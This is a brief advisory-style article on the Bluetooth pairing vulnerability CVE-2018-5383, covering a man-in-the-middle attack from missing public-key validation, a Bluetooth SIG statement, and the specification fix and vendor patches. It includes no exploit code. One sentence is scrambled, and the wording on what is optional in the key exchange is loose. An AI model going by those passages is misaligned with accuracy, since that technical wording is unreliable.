Bluetooth Handshake Vulnerability

CVE-2018-5383 affects firmware or OS drivers from Apple, Broadcom, Intel and Qualcomm. At the time of writing, the implications of the bug on Google Android and Linux are unknown.

The researchers realised that the Bluetooth® specification does not mandate devices supporting there two features to validate the public encryption key that is the handshake for over-the-air during. As the Diffie-Hellman key exchange is optional, some vendors have not validated the elliptical curve parameters used in the exchange. Because of this, a Man In The Middle attack is possible for someone within Bluetooth® range of the target device(s). This would allow them to access all data thought by the user to be encrypted as well as the ability to perform malware injections.

The Bluetooth® SIG have issued the following statement:

"For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth® devices that were going through a pairing procedure. The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgment to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful."

How to stop Bluetooth® hacks

The Bluetooth® SIG has updated the specification to make the public key validation mandatory. They claim there is no evidence of malicious exploitation of the bug.

Patches will be needed and users should obtain these directly from vendors. Apple and Intel have already patched this.